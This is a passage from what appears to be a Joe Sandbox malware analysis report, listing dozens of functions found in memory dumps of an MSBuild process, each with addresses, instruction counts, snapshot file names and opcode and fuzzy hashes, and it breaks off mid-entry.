                              • Opcode ID: d019a4bd423ccf69a2d9ca22b31936bc87116439dcc7ed3cc573ccc0b8062eba
                              • Instruction ID: 143a55dded2e819f66bc54a8d9c6d0b3503aa171752b79e7333a1d46a2504212
                              • Opcode Fuzzy Hash: d019a4bd423ccf69a2d9ca22b31936bc87116439dcc7ed3cc573ccc0b8062eba
                              • Instruction Fuzzy Hash: 4A71F774E002099FDB15DFA9C484A9DBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FA5F Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 63ddc0a365c692186f025f4f49ac5c08f315e4f627a373b10a7734d146e9ee06
                              • Instruction ID: 2f785001d72728573cf30a2413f003ecf3b651ddc1688392ad9c9c81c21119a9
                              • Opcode Fuzzy Hash: 63ddc0a365c692186f025f4f49ac5c08f315e4f627a373b10a7734d146e9ee06
                              • Instruction Fuzzy Hash: 8171F774E002099FDB15DFA9C484A9EBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 05B85510 Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4629630e44e2e1d5b0eea2a16e99f5d743dc539c6c52c68dd371ea4a275a1433
                              • Instruction ID: 1066b65db686d1ba680c64bf9aa7cd273f83be5944ef7887817c4b26c786d56f
                              • Opcode Fuzzy Hash: 4629630e44e2e1d5b0eea2a16e99f5d743dc539c6c52c68dd371ea4a275a1433
                              • Instruction Fuzzy Hash: 7271AF74D002099FCB14DFA9D894ADDFBB2FF89300F24826AE409AB351EB31A945CF54
                              Function 05B8FB08 Relevance: .2, Instructions: 157COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 589014acae2464c65c2293f6d1cdb96edf75774276b961b92e6513d7b04a3c6d
                              • Instruction ID: 816fb5d1cc938a9672bf0a0e335c03d8dc6e8821985be0a99ac95019a449419a
                              • Opcode Fuzzy Hash: 589014acae2464c65c2293f6d1cdb96edf75774276b961b92e6513d7b04a3c6d
                              • Instruction Fuzzy Hash: 7A51A571A04219DFDB14EFA5D841ABEB7B2FF88311F1495A9D805A7340DB70FA41CB90
                              Function 05B88800 Relevance: .2, Instructions: 156COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b582814d239316736969ef66657e8349cf1eb3515e8a33cb647039cc87ac3b4
                              • Instruction ID: 0203020fda940472c6c8d73cc4112341d9d2425db8da0de963da34641d8184d2
                              • Opcode Fuzzy Hash: 2b582814d239316736969ef66657e8349cf1eb3515e8a33cb647039cc87ac3b4
                              • Instruction Fuzzy Hash: 7951E032B083049FD715EFB8D454B2EBBA6EF89210F5445AEE446CB351CB74AC46C7A2
                              Function 05B3F4E0 Relevance: .2, Instructions: 155COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90e437665557935336b072bd9bb57dbb0041ab6a3d9371af10deed1c7860f11d
                              • Instruction ID: 8545481a9fedcaeb781a00f2ddb142a029899a5097214f8cab9a1bfe36cf99d0
                              • Opcode Fuzzy Hash: 90e437665557935336b072bd9bb57dbb0041ab6a3d9371af10deed1c7860f11d
                              • Instruction Fuzzy Hash: E051D235B053019FCB14DF64C845A79BBB2FF89210B1585FAD449DB262DB38EC09CBA1
                              Function 05B89E08 Relevance: .2, Instructions: 151COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7596c95d166ef7c5df387374f5d63623718fa0a602605fc7342b0f45eb06fe9b
                              • Instruction ID: 6f26e7415348c627812936cb14311604d8370166e348f1ba1fbe8ea2a69dce89
                              • Opcode Fuzzy Hash: 7596c95d166ef7c5df387374f5d63623718fa0a602605fc7342b0f45eb06fe9b
                              • Instruction Fuzzy Hash: E661C474E112199FDB04DFA8D884BEEBBB2FF49300F108069E415AB394DB74A945CFA4
                              Function 05B84E20 Relevance: .1, Instructions: 132COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60c1bea4ba4da9799bd2d7ea87179511ff8e8207a1230e75868eafa8f6c8c913
                              • Instruction ID: b6f79bab929c01b21b6653ed23fbd5573a708cfedf14719cf80abdc30b52a5e3
                              • Opcode Fuzzy Hash: 60c1bea4ba4da9799bd2d7ea87179511ff8e8207a1230e75868eafa8f6c8c913
                              • Instruction Fuzzy Hash: C751EDB4D0520ACFDF04EFA9C884AEEBBB2BF49304F10956AD815AB354E7746946CF50
                              Function 05B3F5F0 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5498550f81aa8a0b3f1158748b673a951bf052076ca492c0696cead79d403cde
                              • Instruction ID: 1bab7612ba75d47f4901b5f011dc3a54885f173f809015606d9fad84ab30c9d6
                              • Opcode Fuzzy Hash: 5498550f81aa8a0b3f1158748b673a951bf052076ca492c0696cead79d403cde
                              • Instruction Fuzzy Hash: 0541C136B142019FCB18EA78D95667E7BE6EFC825071005B9D84AE7291EF38FC05C7A1
                              Function 04E5B0C8 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a422e86763fe136c14bc148b3e96cb5177605dd0224149d0e40fe354e1e73bfc
                              • Instruction ID: 2f06daf447962668e7894cd71874168175734b624018be2c50aae1d4bd168b96
                              • Opcode Fuzzy Hash: a422e86763fe136c14bc148b3e96cb5177605dd0224149d0e40fe354e1e73bfc
                              • Instruction Fuzzy Hash: EC519F31A003059FCB11DF58D981AAEBBB2FF88314F18C969D4199B255DB71FD068BA2
                              Function 04E5DB58 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40357db353c13391688f68148bc8e82db1302c20466c1b3c77ae6607136c3754
                              • Instruction ID: 9bd390c9b6b49db7b6eb1bb8bb00ed2048d57af0c413fad703961b7ec52c759c
                              • Opcode Fuzzy Hash: 40357db353c13391688f68148bc8e82db1302c20466c1b3c77ae6607136c3754
                              • Instruction Fuzzy Hash: 2741C2327057508FD7659B29D880D5BBBE6EFC5724319C8AAE9499B261DA30FC00C790
                              Function 05B85738 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90908a847decb51c40b0fbd97ca0d2319bd23db00a00b659d56b68af5c8ce54f
                              • Instruction ID: 46a7f254901dcc64f7d25b5f07d11acb2938a589fa7e68904be4b2180ae7a5ed
                              • Opcode Fuzzy Hash: 90908a847decb51c40b0fbd97ca0d2319bd23db00a00b659d56b68af5c8ce54f
                              • Instruction Fuzzy Hash: 8C51EA74E01248EFDB14DFA9D484AADBBF2FF89310F14946AE806AB354DB706845CF50
                              Function 04E5C860 Relevance: .1, Instructions: 122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8827cd1827dbd68e15ef0a9f5f65289dc47138b9cef1582ca6ce0282c60ce8d0
                              • Instruction ID: 8c804fc5ce2beb1508ec1b88fa3b8b43068691b94a697fdef28825636877122a
                              • Opcode Fuzzy Hash: 8827cd1827dbd68e15ef0a9f5f65289dc47138b9cef1582ca6ce0282c60ce8d0
                              • Instruction Fuzzy Hash: 30418E312103019FD725AB74E495A2E7BF6EB89300B44C92CE4468B791DF71ED0A9BA2
                              Function 05B89190 Relevance: .1, Instructions: 122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 776ceabf9637e08c90b2a5647799e3e074baa165e9f2d0590edb93bcfac29d12
                              • Instruction ID: 339d40d368c10eb23e14027e232268bed76b57cfa28f8e21154a81c59740f8da
                              • Opcode Fuzzy Hash: 776ceabf9637e08c90b2a5647799e3e074baa165e9f2d0590edb93bcfac29d12
                              • Instruction Fuzzy Hash: 4641DE317046009FDB15AFA8D594B2EBBE6FF88310B14856EE44ACB751CE34EC45CBA1
                              Function 04E5B869 Relevance: .1, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0c68522a1e968c30cd2e350277f28a7161c8277add7f89769ffb57d4e860f59
                              • Instruction ID: 95d8c96e23664b55d0319c85dcc292013d24bec907d3e2edde324387c8bcfc80
                              • Opcode Fuzzy Hash: f0c68522a1e968c30cd2e350277f28a7161c8277add7f89769ffb57d4e860f59
                              • Instruction Fuzzy Hash: 95417F712007405FE715EB25E842B5E77A2FF89310F84CA6CD0468B692DBB1FD08DBA2
                              Function 05B3C868 Relevance: .1, Instructions: 119COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7cd1fecd3303225dd757058b8c1c592049cbab2f061a35fb56502acef0169146
                              • Instruction ID: 98ebe9309a0f1025057c06e0c8918baef7158b8f7bfcc6c6029b41749fee19e4
                              • Opcode Fuzzy Hash: 7cd1fecd3303225dd757058b8c1c592049cbab2f061a35fb56502acef0169146
                              • Instruction Fuzzy Hash: 884147343046009FC715DF69C485D2ABBE6FF89310B1646A9E58AEB772DB30EC41CB50
                              Function 04E5B040 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e825e56457c1bf74e4cb5abc83be90a587f32fdec50f1d61883ddd683f35e12a
                              • Instruction ID: 7255ec3e3d1e8946f0a4ab608367dec04b288d3b5a9b1e474f904d5eff037cf0
                              • Opcode Fuzzy Hash: e825e56457c1bf74e4cb5abc83be90a587f32fdec50f1d61883ddd683f35e12a
                              • Instruction Fuzzy Hash: C2411675A0060A9FCB04DF98C981AAEF7B5FF88314B19C619D9199B211D730F9428BA1
                              Function 04E5C870 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea2c271d3af3f76a814568eff33af85cfbba23d6cb2d12e0449b55834614fcd2
                              • Instruction ID: ed5a32320a92b8a2a9ffb88a7f476e8554d5219cdc36ccdf7cd55de564e08fff
                              • Opcode Fuzzy Hash: ea2c271d3af3f76a814568eff33af85cfbba23d6cb2d12e0449b55834614fcd2
                              • Instruction Fuzzy Hash: 10417D312107019FD725AB74E495A2EBBF6FB88300B44C92CE4468B791DF71ED069BA2
                              Function 05B8A4C0 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1de5a4b7aa59e983552d370fd3dfacc81556b14da04e1211231b61f417b5d704
                              • Instruction ID: c30814dbb5e9da19957c226b9dab4606e81589fe0bdc27e69f55bb1dd9540f36
                              • Opcode Fuzzy Hash: 1de5a4b7aa59e983552d370fd3dfacc81556b14da04e1211231b61f417b5d704
                              • Instruction Fuzzy Hash: 6A41B271E052198FDB14DF69C984BEEFBF2BF88310F1491A6D408A7251D734AA85CF50
                              Function 05B8F7D7 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1c06d7cc94253e1344da10a277533f1c20f71d69f6b7e07b1dced03e2319a84c
                              • Instruction ID: 0f6a6e7190aa8ca679c60ea8062c0a316291c54387059465733cf2971070e1ba
                              • Opcode Fuzzy Hash: 1c06d7cc94253e1344da10a277533f1c20f71d69f6b7e07b1dced03e2319a84c
                              • Instruction Fuzzy Hash: 15413575D01218EFDB01DFA4D844AADBBB1FF49300F14A6A9E400AB361D774AE95DF84
                              Function 05B85748 Relevance: .1, Instructions: 117COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7edf368324a105e8dca0a26c2d68b66a777f387f821b50ddd9c9178f5864a54
                              • Instruction ID: 6bf4e03cec1d79efb2430ad2cffa757910b17c295600e500ee03be35de3806b7
                              • Opcode Fuzzy Hash: b7edf368324a105e8dca0a26c2d68b66a777f387f821b50ddd9c9178f5864a54
                              • Instruction Fuzzy Hash: 2241DB74E01208DFDB18DFA9D484AADBBF2FF89311F14946AE805AB354DB70A845CF54
                              Function 05B8A010 Relevance: .1, Instructions: 116COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24c2561d2ac42ee8734dd845bd232c8b6e1c061c351ecc64d86d02a339c436ed
                              • Instruction ID: c2584834afc9587376222b4e64ffe38a0cea4b349d37af7fbcf96b1553b61167
                              • Opcode Fuzzy Hash: 24c2561d2ac42ee8734dd845bd232c8b6e1c061c351ecc64d86d02a339c436ed
                              • Instruction Fuzzy Hash: 2241F270D45218DFDF14EFA9D844AEEBBB2BF4A310F10A06AE415B7290DB346945CF54
                              Function 04E5B878 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a76bfd2e5890cc3691a548d9d5ecc469b5c2d8f7adc8ce5f8e3e1b478a19027
                              • Instruction ID: a381551c4ad4ff613ef0f67505f6faf6d1bc616b974162bbd9bf31da5c75be65
                              • Opcode Fuzzy Hash: 2a76bfd2e5890cc3691a548d9d5ecc469b5c2d8f7adc8ce5f8e3e1b478a19027
                              • Instruction Fuzzy Hash: 4B415E712007015FD715EB25E885B5E77A2FF89310F84CA2CD1468B692DBB0FD08DBA2
                              Function 05B84E30 Relevance: .1, Instructions: 107COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00bd3691c3e249be78be2e95db25839bbe8f8d384d495172f0d911258d7511e8
                              • Instruction ID: efd4c493e138d53fcdf8a4bfffed3f9a3eff455bdfdfe27e424efad7d80e5e6a
                              • Opcode Fuzzy Hash: 00bd3691c3e249be78be2e95db25839bbe8f8d384d495172f0d911258d7511e8
                              • Instruction Fuzzy Hash: DC41BCB4D01209CFDF14EFA5D984AEEBBB2BF49304F10942AD415BB294EB746946CF50
                              Function 05B3CD48 Relevance: .1, Instructions: 107COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 315ca4f3d6128fcb32bb6fee6c69ecf0a7b92970d2fde6b20eda2aba1149fac6
                              • Instruction ID: 04d0c87e7e647d892c55504a43b107b66634cc439276bcba7dfce1d64a07d1a5
                              • Opcode Fuzzy Hash: 315ca4f3d6128fcb32bb6fee6c69ecf0a7b92970d2fde6b20eda2aba1149fac6
                              • Instruction Fuzzy Hash: 4B319F74B002158FDB14EFB5D95666EBFF6FF88200B1045A9D84AEB2A1DF34AD05CB90
                              Function 05B85900 Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ebb9da8cbe0804fdc7dd6d5744209c433df494dff704754c8c68b432c97f83ca
                              • Instruction ID: b41e393158954efee7a548d8bc31e45f95c511776ab4b443acf72694809d2854
                              • Opcode Fuzzy Hash: ebb9da8cbe0804fdc7dd6d5744209c433df494dff704754c8c68b432c97f83ca
                              • Instruction Fuzzy Hash: 6D419E74E012089FCB04CFA9C584AEEBBF1BF89310F14D4AAE819A7360D735A945CF64
                              Function 05B85AD8 Relevance: .1, Instructions: 102COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3fc5419ab433f0f2eea331a8d2baf154ed05d595ac8a2a6fda9085cb0b918320
                              • Instruction ID: b3a10d6c04bbd59f3515857ddaf436db1ac2e3031270bdb21cf46f27ff4d9a9f
                              • Opcode Fuzzy Hash: 3fc5419ab433f0f2eea331a8d2baf154ed05d595ac8a2a6fda9085cb0b918320
                              • Instruction Fuzzy Hash: EE41A274E012189FDB54DFA9D884BDDBBF2BB89300F1490AAE818A7355DB359941CF60
                              Function 05B86D40 Relevance: .1, Instructions: 99COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5d07a597c2130bc6b2c92d8e1fd6ae64181294ec50237f67724df9127f22c7b7
                              • Instruction ID: f59f25e5c4ac17c4466dc6d094beb54b4344e57ba649053d8d0a716c65d1b2eb
                              • Opcode Fuzzy Hash: 5d07a597c2130bc6b2c92d8e1fd6ae64181294ec50237f67724df9127f22c7b7
                              • Instruction Fuzzy Hash: 753121313092509FDB066F7A582473E6BA7EFC6211B1840AED806DB3D1CE399D06C7B6
                              Function 05B858EF Relevance: .1, Instructions: 98COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 914e9e3213b85c9beeb73361d0265bf5cb721159fdbe95718653ad565f194109
                              • Instruction ID: 7916d7cd937ad2ede67051d1b2092ddb86cae82c581a54a170b21a0a75ddffd0
                              • Opcode Fuzzy Hash: 914e9e3213b85c9beeb73361d0265bf5cb721159fdbe95718653ad565f194109
                              • Instruction Fuzzy Hash: FD41AD74E012089FCB04DFA9D984AEEBBF2AF89310F14946AE815A7350D734A941CF64
                              Function 05B842F2 Relevance: .1, Instructions: 98COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 659a69797c588c82e5e8d833990381587fe788c8481374f06c0292e1bf6a8a96
                              • Instruction ID: 271b4f4c9b292fd3e1273bcc7970f53571ae3095ed951995760cacfb3a6cb9de
                              • Opcode Fuzzy Hash: 659a69797c588c82e5e8d833990381587fe788c8481374f06c0292e1bf6a8a96
                              • Instruction Fuzzy Hash: 4E41B075E012189FDB14DFAAD884BDEBBF2BB89300F1490AAE408A7354DB349945CF50
                              Function 05B3C858 Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 448f6fd0f5c00ef0d1ee7459725496e95d4881bbaeb5b99e6d0a4e0c9ba20b98
                              • Instruction ID: cafdfdf1a5ce4c5baa246f796378ac31038622dd279922ca558c51d0480799dc
                              • Opcode Fuzzy Hash: 448f6fd0f5c00ef0d1ee7459725496e95d4881bbaeb5b99e6d0a4e0c9ba20b98
                              • Instruction Fuzzy Hash: 0831C0763086009FC7158BA8D846879BFA6FF8821131606EAE546EB362CF30ED41CB51
                              Function 04E5E098 Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d51007bed86507d1d39eabc4ade138d75c730fd934f5624c7abf32f4a700eeac
                              • Instruction ID: a07702884936876c9231d7e67f721d76a2b8abbf33332dfe73aab0221615d3b2
                              • Opcode Fuzzy Hash: d51007bed86507d1d39eabc4ade138d75c730fd934f5624c7abf32f4a700eeac
                              • Instruction Fuzzy Hash: CE316D75B00215CFC704EFA9D850A6AB7F6FFC9350B25816DE90ADB361DA31AD41CBA0
                              Function 05B85010 Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f92680ff9a64f1494eddf87b9c532aa85b291303aeb4159162f71f02604c407f
                              • Instruction ID: 269efbeeade2e5afdaf3d6b0fdb93575ee90f6d129bc8fa98a66f2f209b5c8ca
                              • Opcode Fuzzy Hash: f92680ff9a64f1494eddf87b9c532aa85b291303aeb4159162f71f02604c407f
                              • Instruction Fuzzy Hash: B431DD74D01218DFDB28EFA8D4446EEBBB2BF49701F10546AD016B7290EB756A85CBA0
                              Function 04E5BE19 Relevance: .1, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a9e2c175960608a3f492b6a72df6ea71dd60c4f13a39780f28cc2afa54408493
                              • Instruction ID: e98dce4c9e6edfa06ea13ac69447703bd41b8662520ebf4e6d0b37eb9075ee24
                              • Opcode Fuzzy Hash: a9e2c175960608a3f492b6a72df6ea71dd60c4f13a39780f28cc2afa54408493
                              • Instruction Fuzzy Hash: BE214F353003455BE708AA36E862B3F2367EBC5350F48C92CE5468F2D5DDB1ED0667A2
                              Function 05B84FFE Relevance: .1, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a32fa395261ab795d46f7fe8d32a0b4028d30f72bde5c981d55a1275b5fd5e8
